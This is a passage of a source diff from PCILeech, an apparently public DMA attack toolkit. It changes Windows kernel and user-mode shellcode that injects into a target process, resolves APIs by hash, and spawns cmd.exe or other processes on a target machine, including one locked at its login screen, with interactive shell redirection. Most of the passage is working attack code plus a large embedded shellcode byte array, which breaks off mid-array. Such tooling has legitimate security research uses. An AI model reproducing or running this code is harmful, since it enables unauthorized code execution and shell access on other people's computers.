+++ b/pcileech_shellcode/wx64_exec_user_c.c
@@ -1,6 +1,6 @@
 // wx64_exec_user_c.c : usermode code to be injected into user process to spawn new processes.
 //
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 // compile with:
@@ -52,9 +52,7 @@ typedef struct tdUserShellConfig {
 #define H_CreateProcessA			0x16b3fe72
 #define H_CreateThread				0xca2bd06b
 #define H_GetExitCodeProcess		0xac30ab74
-#define H_GetLastError				0x75da1966
 #define H_LocalAlloc				0x4c0297fa
-#define H_LocalFree					0x5cbaeaf6
 #define H_ReadFile					0x10fa6516
 #define H_Sleep						0xdb2d49b0
 #define H_WriteFile					0xe80a791f
@@ -93,14 +91,10 @@ typedef struct tdUserShellFunctions {
 		_In_  HANDLE  hProcess,
 		_Out_ LPDWORD lpExitCode
 		);
-	DWORD(*GetLastError)(void);
 	HLOCAL(*LocalAlloc)(
 		_In_ UINT   uFlags,
 		_In_ SIZE_T uBytes
 		);
-	HLOCAL(*LocalFree)(
-		_In_ HLOCAL hMem
-		);
 	BOOL(*ReadFile)(
 		_In_        HANDLE       hFile,
 		_Out_       LPVOID       lpBuffer,
@@ -171,17 +165,20 @@ PVOID PEGetProcAddressH(_In_ HMODULE hModuleIn, _In_ DWORD dwProcNameH)
 
 VOID UserShellInitializeFunctions(_In_ HMODULE hModuleKernel32, _Out_ PUSERSHELL_FUNCTIONS fnu)
 {
-	fnu->CloseHandle = PEGetProcAddressH(hModuleKernel32, H_CloseHandle);
-	fnu->CreatePipe = PEGetProcAddressH(hModuleKernel32, H_CreatePipe);
-	fnu->CreateProcessA = PEGetProcAddressH(hModuleKernel32, H_CreateProcessA);
-	fnu->CreateThread = PEGetProcAddressH(hModuleKernel32, H_CreateThread);
-	fnu->GetExitCodeProcess = PEGetProcAddressH(hModuleKernel32, H_GetExitCodeProcess);
-	fnu->GetLastError = PEGetProcAddressH(hModuleKernel32, H_GetLastError);
-	fnu->LocalAlloc = PEGetProcAddressH(hModuleKernel32, H_LocalAlloc);
-	fnu->LocalFree = PEGetProcAddressH(hModuleKernel32, H_LocalFree);
-	fnu->ReadFile = PEGetProcAddressH(hModuleKernel32, H_ReadFile);
-	fnu->Sleep = PEGetProcAddressH(hModuleKernel32, H_Sleep);
-	fnu->WriteFile = PEGetProcAddressH(hModuleKernel32, H_WriteFile);
+	DWORD i = 0, NAMES[9];
+	NAMES[i++] = H_CloseHandle;
+	NAMES[i++] = H_CreatePipe;
+	NAMES[i++] = H_CreateProcessA;
+	NAMES[i++] = H_CreateThread;
+	NAMES[i++] = H_GetExitCodeProcess;
+	NAMES[i++] = H_LocalAlloc;
+	NAMES[i++] = H_ReadFile;
+	NAMES[i++] = H_Sleep;
+	NAMES[i++] = H_WriteFile;
+	while(i) {
+		i--;
+		*((PQWORD)fnu + i) = (QWORD)PEGetProcAddressH(hModuleKernel32, NAMES[i]);
+	}
 }
 
 BOOL UserShellIsProcessRunning(PUSERSHELL_DATA pd)
@@ -221,14 +218,12 @@ BOOL UserShellExec(_Inout_ PUSERSHELL_DATA pd)
 	}
 	// launch executable
 	if(!pd->fnu.CreateProcessA(NULL, pd->pCfg->szProcToStart, NULL, NULL, TRUE, pd->pCfg->fCreateProcess, NULL, NULL, psi, &pi)) {
-		pd->fnu.LocalFree(psi);
 		return FALSE;
 	}
 	pd->hProcessHandle = pi.hProcess;
 	if(pd->pCfg->qwAddrConsoleBuffer) {
 		pd->fnu.CloseHandle(pi.hThread);
 	}
-	pd->fnu.LocalFree(psi);
 	return TRUE;
 }
 
@@ -309,7 +304,6 @@ VOID c_EntryPoint(PBYTE pb, ULONG_PTR lpBaseKernel32)
 	// create process
 	if(!UserShellExec(pd)) {
 		UserShellCleanup(pd);
-		pd->fnu.LocalFree(pd);
 		return;
 	}
 	// Initalize console redirection #2/2
@@ -317,4 +311,4 @@ VOID c_EntryPoint(PBYTE pb, ULONG_PTR lpBaseKernel32)
 		pd->fnu.CreateThread(NULL, 0, &UserShellThreadWriter, pd, 0, NULL);
 		pd->fnu.CreateThread(NULL, 0, &UserShellThreadReader, pd, 0, NULL);
 	}
-}
\ No newline at end of file
+}
diff --git a/pcileech_shellcode/wx64_pscreate.c b/pcileech_shellcode/wx64_pscreate.c
index b567e1e..f7e2a2d 100644
--- a/pcileech_shellcode/wx64_pscreate.c
+++ b/pcileech_shellcode/wx64_pscreate.c
@@ -6,19 +6,19 @@
 //
 // compile with (wx64_pscreate):
 // cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_WIN7_COMPAT wx64_pscreate.c
 // ml64 wx64_common_a.asm /Fewx64_pscreate.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
 // shellcode64.exe -o wx64_pscreate.exe "PROCESS CREATOR - SPAWN NEW PROCESSES ON TARGET!               \n===============================================================\nREQUIRED OPTIONS:                                              \n  -s   : Executable path including command line options.       \n         Example: '-s c:\windows\system32\cmd.exe'.            \n  -0   : Parent process PID to start new process from.         \n         Example '-0 0x0fe0'.                                  \nOPTIONAL OPTIONS:                                              \n  -1   : CreateProcess creation flags (dwCreationFlags) as     \n         specified on MSDN. Hidden Window = 0x08000000         \n  -2   : Redirect input - use to spawn interactive shell.      \n         Example: 0x01                                         \n  -3   : Timeout in seconds. Default: 60.                      \n  -4   : Boost (Windows 7 only): higher success ratio, but     \n         parent process may crash. Example 1. Default 0.       \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT =====%s\nNTSTATUS        : 0x%08X                                       \nADDITIONAL INFO : 0x%04X                                       \n===============================================================\n"
 //
 // ALTERNATIVELY (wx64_pscmd):
 // cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM /D_WIN7_COMPAT wx64_pscreate.c
 // ml64 wx64_common_a.asm /Fewx64_pscmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
 // shellcode64.exe -o wx64_pscmd.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET!        \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nonly work if the target system is locked and the login screen is\nvisible. If it takes time waiting - then please touch any key on\nthe target system.   If the utility fails multiple times, please\ntry wx64_pscreate instead.                                      \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS        : 0x%08X                                        \nADDITIONAL INFO : 0x%04X                                        \n================================================================\n"
 //
 // ALTERNATIVELY (wx64_pscmd_user):
 // cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_USER wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_USER /D_WIN7_COMPAT wx64_pscreate.c
 // ml64 wx64_common_a.asm /Fewx64_pscmd_user.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
 // shellcode64.exe -o wx64_pscmd_user.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE AS USER ON TARGET!        \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nwill spawn a cmd.exe in the context of a random logged on user.\nThis will work even though the computer may be locked. If this\nutility fails multiple times, please try wx64_pscreate instead.                                      \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS        : 0x%08X                                        \nADDITIONAL INFO : 0x%04X                                        \n================================================================\n"
 #include "wx64_common.h"
@@ -213,9 +213,6 @@ typedef struct tdKERNEL_FUNCTIONS2 {
 		_In_    ULONG     AllocationType,
 		_In_    ULONG     Protect
 		);
-	NTSTATUS(*ZwClose)(
-		_In_ HANDLE Handle
-		);
 	NTSTATUS(*ZwOpenProcess)(
 		_Out_    PHANDLE            ProcessHandle,
 		_In_     ACCESS_MASK        DesiredAccess,
@@ -227,43 +224,45 @@ typedef struct tdKERNEL_FUNCTIONS2 {
 
 VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS2 fnk2)
 {
-	QWORD FUNC2[][2] = {
-		{ &fnk2->IoAllocateMdl,						H_IoAllocateMdl },
-		{ &fnk2->KeInitializeApc,					H_KeInitializeApc },
-		{ &fnk2->KeInsertQueueApc,					H_KeInsertQueueApc },
-		{ &fnk2->KeStackAttachProcess,				H_KeStackAttachProcess },
-		{ &fnk2->KeUnstackDetachProcess,			H_KeUnstackDetachProcess },
-		{ &fnk2->MmAllocateContiguousMemory,		H_MmAllocateContiguousMemory },
-		{ &fnk2->MmFreeContiguousMemory,			H_MmFreeContiguousMemory },
-		{ &fnk2->MmMapLockedPagesSpecifyCache,		H_MmMapLockedPagesSpecifyCache },
-		{ &fnk2->MmProbeAndLockPages,				H_MmProbeAndLockPages },
-		{ &fnk2->ObDereferenceObject,				H_ObDereferenceObject },
-		{ &fnk2->PsGetProcessImageFileName,			H_PsGetProcessImageFileName },
-		{ &fnk2->PsLookupProcessByProcessId,		H_PsLookupProcessByProcessId },
-		{ &fnk2->PsLookupThreadByThreadId,			H_PsLookupThreadByThreadId },
-		{ &fnk2->RtlCreateUserThread,				H_RtlCreateUserThread },
-		{ &fnk2->strnlen,							H_strnlen },
-		{ &fnk2->ZwAllocateVirtualMemory,			H_ZwAllocateVirtualMemory },
-		{ &fnk2->ZwClose,							H_ZwClose },
-		{ &fnk2->ZwOpenProcess,						H_ZwOpenProcess }
-	};
-	for(QWORD j = 0; j < (sizeof(FUNC2) / sizeof(QWORD[2])); j++) {
-		*(PQWORD)FUNC2[j][0] = PEGetProcAddressH(qwNtosBase, (DWORD)FUNC2[j][1]);
+	DWORD i = 0, NAMES[18];
+	NAMES[i++] = H_IoAllocateMdl;
+	NAMES[i++] = H_KeInitializeApc;
+	NAMES[i++] = H_KeInsertQueueApc;
+	NAMES[i++] = H_KeStackAttachProcess;
+	NAMES[i++] = H_KeUnstackDetachProcess;
+	NAMES[i++] = H_MmAllocateContiguousMemory;
+	NAMES[i++] = H_MmFreeContiguousMemory;
+	NAMES[i++] = H_MmMapLockedPagesSpecifyCache;
+	NAMES[i++] = H_MmProbeAndLockPages;
+	NAMES[i++] = H_ObDereferenceObject;
+	NAMES[i++] = H_PsGetProcessImageFileName;
+	NAMES[i++] = H_PsLookupProcessByProcessId;
+	NAMES[i++] = H_PsLookupThreadByThreadId;
+	NAMES[i++] = H_RtlCreateUserThread;
+	NAMES[i++] = H_strnlen;
+	NAMES[i++] = H_ZwAllocateVirtualMemory;
+	NAMES[i++] = H_ZwOpenProcess;
+	while(i) {
+		i--;
+		*((PQWORD)fnk2 + i) = (QWORD)PEGetProcAddressH(qwNtosBase, NAMES[i]);
 	}
 }
 
 //----------------------------------------------------------------------------------------------------------
-
-NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCTIONS2 fnk2, PBYTE pb, QWORD qwAddrConsoleBuffer)
+// USER MODE SHELLCODE ASSIGNMENT BELOW:
+//----------------------------------------------------------------------------------------------------------
+#ifndef _EXEC_USER_EXTERNAL
+VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWORD pcb)
 {
-	unsigned char wx64_exec_user_bin[] = {
+	UNREFERENCED_PARAMETER(pk);
+	BYTE wx64_exec_user_bin[] = {
 		0xb0, 0x00, 0xb2, 0x01, 0x48, 0x8d, 0x0d, 0x49, 0x00, 0x00, 0x00, 0xf0,
 		0x0f, 0xb0, 0x11, 0x75, 0x42, 0x48, 0x8d, 0x0d, 0xe8, 0xff, 0xff, 0xff,
 		0x48, 0x81, 0xe1, 0x00, 0xf0, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x14, 0x25,
 		0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18,
 		0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x12, 0x48, 0x8b, 0x12, 0x48, 0x8b,
 		0x52, 0x20, 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83,
-		0xec, 0x20, 0xe8, 0x69, 0x04, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
+		0xec, 0x20, 0xe8, 0xe1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
 		0x00, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
 		0x24, 0x10, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x48, 0x63, 0x41, 0x3c, 0x4c,
 		0x8b, 0xc9, 0x8b, 0xf2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00,
@@ -277,117 +276,130 @@ NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In
 		0x24, 0x08, 0x48, 0x8b, 0x74, 0x24, 0x10, 0x48, 0x8b, 0x7c, 0x24, 0x18,
 		0xc3, 0x41, 0x0f, 0xb7, 0x0c, 0x4b, 0x8b, 0x04, 0x8b, 0x49, 0x03, 0xc1,
 		0xeb, 0xe3, 0xcc, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
-		0x81, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89,
-		0x08, 0x39, 0x8b, 0x98, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x98,
-		0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x68, 0xff, 0x53, 0x08, 0x48, 0x8b,
-		0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x70, 0xff, 0x53, 0x08,
-		0x48, 0x8b, 0x4b, 0x78, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x83, 0x80, 0x00,
-		0x00, 0x00, 0x48, 0xb9, 0xac, 0xda, 0x37, 0x13, 0x00, 0x22, 0xda, 0xfe,
-		0x48, 0x89, 0x08, 0x48, 0x8b, 0x83, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89,
-		0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24,
-		0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x70, 0xbe,
-		0x68, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x8b, 0xd6, 0x8d, 0x4e, 0xd8,
-		0xff, 0x53, 0x38, 0x48, 0x8b, 0xf8, 0x89, 0x30, 0x33, 0xf6, 0xc7, 0x40,
-		0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13, 0x48, 0x39, 0xb2, 0x08,
-		0x01, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x89, 0x48,
-		0x58, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x89, 0x48, 0x50, 0x48, 0x8b, 0x4b,
-		0x70, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b, 0x13, 0x48, 0x8d, 0x44, 0x24,
-		0x50, 0x48, 0x89, 0x44, 0x24, 0x48, 0x45, 0x33, 0xc9, 0x48, 0x89, 0x7c,
-		0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x74, 0x24, 0x38, 0x33, 0xc9,
-		0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0x74, 0x24, 0x30, 0x89,
-		0x44, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff,
-		0x53, 0x18, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x44, 0x24, 0x50, 0x48,
-		0x89, 0x83, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x39, 0xb0,
-		0x08, 0x01, 0x00, 0x00, 0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff,
-		0x53, 0x08, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x53,
-		0x40, 0x4c, 0x8d, 0x5c, 0x24, 0x70, 0x8b, 0xc6, 0x49, 0x8b, 0x5b, 0x10,
-		0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0xe3, 0x5f, 0xc3, 0xcc, 0xcc, 0xcc,
-		0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
-		0xfa, 0x48, 0x8b, 0xd9, 0xba, 0xfb, 0x97, 0xfd, 0x0f, 0xe8, 0x22, 0xfe,
-		0xff, 0xff, 0xba, 0x80, 0x8f, 0x0c, 0x17, 0x48, 0x89, 0x07, 0x48, 0x8b,
-		0xcb, 0xe8, 0x12, 0xfe, 0xff, 0xff, 0xba, 0x72, 0xfe, 0xb3, 0x16, 0x48,
-		0x89, 0x47, 0x08, 0x48, 0x8b, 0xcb, 0xe8, 0x01, 0xfe, 0xff, 0xff, 0xba,
-		0x6b, 0xd0, 0x2b, 0xca, 0x48, 0x89, 0x47, 0x10, 0x48, 0x8b, 0xcb, 0xe8,
-		0xf0, 0xfd, 0xff, 0xff, 0xba, 0x74, 0xab, 0x30, 0xac, 0x48, 0x89, 0x47,
-		0x18, 0x48, 0x8b, 0xcb, 0xe8, 0xdf, 0xfd, 0xff, 0xff, 0xba, 0x66, 0x19,
-		0xda, 0x75, 0x48, 0x89, 0x47, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0xce, 0xfd,
-		0xff, 0xff, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0x48, 0x89, 0x47, 0x28, 0x48,
-		0x8b, 0xcb, 0xe8, 0xbd, 0xfd, 0xff, 0xff, 0xba, 0xf6, 0xea, 0xba, 0x5c,
-		0x48, 0x89, 0x47, 0x30, 0x48, 0x8b, 0xcb, 0xe8, 0xac, 0xfd, 0xff, 0xff,
-		0xba, 0x16, 0x65, 0xfa, 0x10, 0x48, 0x89, 0x47, 0x38, 0x48, 0x8b, 0xcb,
-		0xe8, 0x9b, 0xfd, 0xff, 0xff, 0xba, 0xb0, 0x49, 0x2d, 0xdb, 0x48, 0x89,
-		0x47, 0x40, 0x48, 0x8b, 0xcb, 0xe8, 0x8a, 0xfd, 0xff, 0xff, 0xba, 0x1f,
-		0x79, 0x0a, 0xe8, 0x48, 0x89, 0x47, 0x48, 0x48, 0x8b, 0xcb, 0xe8, 0x79,
-		0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48, 0x89, 0x47, 0x50,
-		0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28,
-		0x48, 0x8b, 0xc1, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x90,
-		0x00, 0x00, 0x00, 0xff, 0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f,
-		0x81, 0x7c, 0x24, 0x30, 0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01,
-		0x00, 0x00, 0x00, 0x8b, 0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc,
-		0x48, 0x89, 0x5c, 0x24, 0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9,
-		0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xba, 0x00,
-		0x00, 0x00, 0xbe, 0x00, 0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5,
-		0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xa5, 0x00, 0x00, 0x00, 0x48,
-		0x8b, 0x83, 0x80, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x8b, 0x88, 0x00, 0x00,
-		0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10, 0x41, 0x8b,
-		0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2, 0xff, 0x07,
-		0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x68, 0x77, 0x08,
-		0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33, 0xc0, 0x49,
-		0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0xff,
-		0x53, 0x48, 0x85, 0xc0, 0x74, 0x56, 0x48, 0x8b, 0x8b, 0x88, 0x00, 0x00,
-		0x00, 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83,
-		0xbb, 0x98, 0x00, 0x00, 0x00, 0x00, 0x74, 0x3c, 0x48, 0x8b, 0xcb, 0xe8,
-		0x2c, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x23, 0xb9, 0x0a, 0x00, 0x00,
-		0x00, 0xff, 0x53, 0x50, 0x48, 0x8b, 0x8b, 0x88, 0x00, 0x00, 0x00, 0x48,
-		0x8b, 0x83, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x49, 0x08, 0x48, 0x2b,
-		0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xc8, 0x83, 0xbb, 0x98, 0x00, 0x00,
-		0x00, 0x00, 0x0f, 0x85, 0x4b, 0xff, 0xff, 0xff, 0x48, 0x8b, 0xcb, 0xe8,
-		0xe8, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0x5c, 0x24, 0x48, 0x48, 0x83, 0xc4,
-		0x30, 0x5e, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9,
-		0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0x85, 0x00,
-		0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xc6, 0xfe, 0xff, 0xff, 0x85, 0xc0,
-		0x74, 0x79, 0x48, 0x8b, 0x93, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8b,
-		0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x42, 0x10, 0x48, 0x39, 0x41, 0x08,
-		0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00, 0x00, 0xff, 0x53, 0x50, 0xeb, 0x4a,
-		0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d, 0x51, 0x68, 0x48, 0x83, 0x64, 0x24,
-		0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0x48, 0x8b, 0x4b, 0x60, 0x25,
-		0xff, 0x07, 0x00, 0x00, 0x41, 0x81, 0xe0, 0xff, 0x07, 0x00, 0x00, 0x48,
-		0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72, 0x06, 0x41, 0xb8, 0x00, 0x08, 0x00,
-		0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53, 0x58, 0x85, 0xc0, 0x74, 0x1c, 0x48,
-		0x8b, 0x8b, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01,
-		0x41, 0x10, 0x83, 0xbb, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x7b,
-		0xff, 0xff, 0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x39, 0xfc, 0xff, 0xff, 0x48,
-		0x83, 0xc4, 0x30, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
-		0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48,
-		0x8b, 0xfa, 0x48, 0x8b, 0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02,
-		0x4c, 0xe8, 0x7e, 0xfb, 0xff, 0xff, 0xba, 0xa0, 0x00, 0x00, 0x00, 0x8d,
-		0x4a, 0xa0, 0xff, 0xd0, 0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48,
-		0x8b, 0xf0, 0x48, 0x89, 0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf,
-		0xe8, 0x1f, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08,
-		0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x84, 0x00, 0x00, 0x00, 0x48, 0x83,
-		0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24,
-		0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21, 0x95, 0xef, 0xdf, 0x32,
-		0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00, 0xbb, 0x00, 0x08, 0x00,
-		0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb, 0x48, 0x8b, 0x06, 0x48,
-		0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89, 0x8e, 0x80, 0x00, 0x00,
-		0x00, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00, 0x10,
-		0x00, 0x00, 0x48, 0x89, 0x86, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89, 0x11,
-		0x48, 0x8d, 0x4e, 0x78, 0x48, 0x8b, 0x86, 0x88, 0x00, 0x00, 0x00, 0x48,
-		0x89, 0x10, 0x48, 0x8d, 0x56, 0x60, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56,
-		0x70, 0x44, 0x8b, 0xcb, 0x48, 0x8d, 0x4e, 0x68, 0x4c, 0x8d, 0x44, 0x24,
-		0x30, 0xff, 0x56, 0x10, 0x89, 0xbe, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b,
-		0xce, 0xe8, 0xb2, 0xfb, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x10, 0x48, 0x8b,
-		0xce, 0xe8, 0x42, 0xfb, 0xff, 0xff, 0x48, 0x8b, 0xce, 0xff, 0x56, 0x40,
-		0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00, 0x00,
-		0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d, 0x05,
-		0x44, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b, 0xce,
-		0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24, 0x28,
-		0x00, 0x4c, 0x8d, 0x05, 0x40, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20,
-		0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48,
-		0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83, 0xc4,
-		0x50, 0x5f, 0xc3
+		0x41, 0x78, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89, 0x08, 0x39, 0x8b,
+		0x88, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x88, 0x00, 0x00, 0x00,
+		0x48, 0x8b, 0x4b, 0x58, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x50, 0xff,
+		0x53, 0x08, 0x48, 0x8b, 0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b,
+		0x68, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x43, 0x70, 0x48, 0xb9, 0xac, 0xda,
+		0x37, 0x13, 0x00, 0x22, 0xda, 0xfe, 0x48, 0x89, 0x08, 0x48, 0x8b, 0x43,
+		0x78, 0x48, 0x89, 0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc,
+		0x40, 0x53, 0x48, 0x83, 0xec, 0x70, 0xba, 0x68, 0x00, 0x00, 0x00, 0x48,
+		0x8b, 0xd9, 0x8d, 0x4a, 0xd8, 0xff, 0x53, 0x30, 0xc7, 0x00, 0x68, 0x00,
